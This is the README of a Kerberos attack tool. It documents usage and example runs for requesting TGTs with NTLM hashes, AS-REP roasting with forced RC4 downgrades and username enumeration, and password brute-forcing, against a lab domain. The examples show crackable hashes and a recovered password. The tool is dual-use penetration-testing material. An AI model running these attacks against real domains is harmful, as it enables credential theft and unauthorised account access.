# cadelo

**Deprecated** check https://gitlab.com/Zer1t0/cerbero

A tool to interact and attack the Kerberos protocol, based on the library [kerbeiros](https://gitlab.com/Zer1t0/kerbeiros).

Compatible with linux and windows.

Still in development...

## Installation
---

### To install from crates

```
cargo install cadelo
cadelo -h
```

### To build from source

```
git clone https://gitlab.com/Zer1t0/cadelo
cd cadelo
cargo build --release
cd target/release/
./cadelo -h
```

## AskTGT
---

Get a Kerberos TGT

### Usage

```
$ ./cadelo asktgt -h
cadelo-asktgt 
Zer1t0
Get a Kerberos TGT

USAGE:
    cadelo asktgt [OPTIONS] --domain <domain> --username <username> <--password <password>|--ntlm <ntlm>|--aes-128 <aes-128>|--aes-256 <aes-256>>

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
        --aes-128 <aes-128>                AES 128 Kerberos key of user
        --aes-256 <aes-256>                AES 256 Kerberos key of user
    -d, --domain <domain>                  Domain to brute-force
    -k, --kdc-ip <ip>                      The address of the KDC
        --ntlm <ntlm>                      NTLM hash of user
        --out-file <file>                  File to save TGT.
    -p, --password <password>              Password of user
        --ticket-format <ticket-format>    Format to save retrieved tickets. [default: ccache]  [possible values: krb,
                                           ccache]
    -u, --username <username>              Username what TGT is for
```

### Examples

Requesting a TGT by using the NTLM hash of user password:
```
$ ./cadelo asktgt -d kingdom.hearts -u mickey --ntlm 7ED026C3D202555DB1F8A8BA91C67C27 --kdc-ip 10.0.0.1
[+] Saved TGT into mickey.ccache
```


## ASREPRoast
---

Search for users without Kerberos pre-authentication, also enumerates usernames.

### How it works
The command `asreproast` sends Kerberos AS-REQ requests in order to discover users that doesn't require Kerberos pre-authentication, what allows to get the AS-REP response from KDC server, which includes a part encrypted with a key derivated from user password. Then, the tool returns this encrypted part formatted to be cracked in John The Ripper or Hashcat.

Moreover, by default the client indicates to the server that ciphers AES-256, AES-128 and RC4 are allowed, so probably the response comes encrypted with AES-256, which is harder to crack. However, the option *--cipher* allows specify a cipher algorithm for publish to the server and force the response encrypted with a weaker cipher as RC4.

Finally, this tool also can be use to enumerate users since it retrieves if an user exists or not. In this case, the different with the [brute](Brute) command is that this method don't generates logs of type [4771-Kerberos pre-authentication failed](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771), only logs of [4768-A Kerberos authentication ticket (TGT) was requested](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768).

#### Generated logs

This tool generates the following log in a Windows Domain Controller:
* [4768 - A Kerberos authentication ticket (TGT) was requested](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768)


### Usage
```
$ ./cadelo asreproast -h
cadelo-asreproast 
AS-REP roast attack

USAGE:
    cadelo asreproast [FLAGS] [OPTIONS] --domain <domain> <--username <username>|--usernames <file>>

FLAGS:
    -h, --help       Prints help information
        --udp        Use of UDP instead of TCP
    -V, --version    Prints version information
    -v, --verbose    Verbose

OPTIONS:
        --cipher <cipher>                Encryption algorithm requested to server. [possible values: rc4, aes128,
                                         aes256]
        --crack-format <crack-format>    Format to save non preauth responses. [default: hashcat]  [possible values:
                                         hashcat, john]
    -d, --domain <domain>                Domain to brute-force
    -k, --kdc-ip <ip>                    The address of the KDC
        --out-file <file>                File to save discovered non preauth responses. It is in hashcat or john format.
    -t, --threads <threads>              Number of threads [default: 1]
    -u, --username <username>            User to check
        --usernames <file>               File with username per line
```

### Example

Look for a list of users without Kerberos pre-authentication required:
```
$ ./cadelo asreproast -d kingdom.hearts --usernames users.txt  -vv
[-] Invalid admin
[-] Invalid root
[*] Valid mickey
[-] Invalid bob
[*] Valid roxas : No Preauth
[*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$3fd92aac4926f3d92db9b224ef5e8a41a26cf689f48e65b9894d488a4ab4652811bf19cde7327325db8c0d435798f6ebe6543c19e74b618cf55658b0edfdd4e3f1a6f518468473beae9fb15c73b8b14fe6dd36e42835347d80b5fe8c77f35a6c2f7e35e273946fa85737c892b8cace5932a521011aab536f37cecf3955a6968c4ca9e19fdbcf305f705ca8f5a181fcf495831ab3dadaaaf3ed77b6df27eec1e8cfa6deeb5b4a920817d5c82eceb64bacc0d7cee790c13e2cdc4022cd9f278b29e3636542d1b778dbb34e2f15c09a2b3827da79d3e3ebd327398c1267fe98094aad3a16d79aa2ab1edf9ccfaf4d35d43b3a70b82f2255c01235b296d2097b3387ecde662c3a7e2b33089bbc7726bf03e4a77384801fbb531643d9f6a227ee3d
[*] Valid xion

  == Execution summary == 

[+] 1 users without pre-auth required were discovered, good luck on crack
```

## Brute
---

Utility to perform a bruteforce attack against the Kerberos protocol. **Be careful**, since user account can get blocked performing this attack.

### How it works
The `brute` command combines the usernames and passwords provide and test all the possibilities.In this way, it is possible to test an unique password for several users, or many passwords for one user. In case a user password is discovered the generated TGT is also saved for future use (this can be disabled with *--no-save-ticket* flag). The discovered credentials can be saved in a file using the *--output-passwords* option.

Furthermore, by processing the Kerberos errors the tool informs if an username exists or not. In the same way, it also indicates if an user account is blocked or disabled. 

Finally, in case an user without Kerberos pre-authentication required was discovered, the tool indicates this and returns the encrypted part of the AS-REP message in John the Ripper or Hashcat format to allow its future crack in order to obtain the user password. (It is also possible to save this results into a file by using the *--output-non-preauth* option).

#### Generated logs

This tool generates the following logs in a Windows Domain Controller:
* [4768 - A Kerberos authentication ticket (TGT) was requested](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768)
* [4771 - Kerberos pre-authentication failed](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771)

### Usage

```
$ ./cadelo brute -h
cadelo-brute 
Zer1t0
Bruteforce attack

USAGE:
    cadelo brute [FLAGS] [OPTIONS] --domain <domain> <--password <password>|--passwords <file>> <--username <username>|--usernames <file>>

FLAGS:
    -h, --help              Prints help information
        --no-save-ticket    Do saved the retrieved tickets
        --udp               Use of UDP instead of TCP
    -V, --version           Prints version information
    -v, --verbose           Verbose

OPTIONS:
        --crack-format <crack-format>      Format to save non preauth responses. [default: hashcat]  [possible values:
                                           hashcat, john]
    -d, --domain <domain>                  Domain to brute-force
    -k, --kdc-ip <ip>                      The address of the KDC
        --output-non-preauth <file>        File to save discovered non preauth responses. It is in hashcat or john
                                           format.
        --output-passwords <file>          File to save discovered user:password per line
    -p, --password <password>              Password to brute-force
        --passwords <file>                 File with password per line
    -t, --threads <threads>                Number of threads [default: 1]
        --ticket-format <ticket-format>    Format to save retrieved tickets. [default: ccache]  [possible values: krb,
                                           ccache]
    -u, --username <username>              Username to brute-force
        --usernames <file>                 File with username per line
```

### Example

Brute-force with a list of usernames and passwords:

```
$ ./cadelo brute -d kingdom.hearts --usernames users.txt --passwords passwords.txt -vvv
[-] Invalid admin
[-] Invalid root
[*] Valid mickey
[-] Invalid bob
[*] Valid roxas : No Preauth
[*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$a96e2f5df8eac27e596c5719b9c8c8134ac1aaef136e2bb6f5c814b34924a625af8e1f5ad802e78d0731ab3c099ac79414c7d601a247920ecb614b45405364bf8a1cc2c7c93c8e075241aa1863976ac9b21de4c9170bffc1a438be99a328be42e2cf465a1e2c949ac716e48ddf151f40c3b452b7785287d7adfa2d96a7f8a1a1df4a1b1c6f98c64893f83864026ee3d134ed6781451dda226034d0b9659b21cb4327b3e51f6b714857a988a184783927a1ea518fe90cc4a11956df0c2d3ae946799196fcbb9e88b5cfcaa78ee04c54e1a14dcdde26465a4d5ee7c13cdc2271c9b81c0cb343d65b73bcae7c7e24bb7de9acbd1938811a913fd97a539195d397a78abe63e06c938401d186a4166d54f6a49b3e162551b7e17f31b3db3587fa76
[!] Blocked/Disabled xion
[+] STUPENDOUS mickey:Minnie1234
[+] Saved mickey ticket into mickey.ccache

  == Execution summary == 

[+] Great, 1 user passwords were discovered
[+] 1 users without pre-auth required were discovered, good luck on crack
```
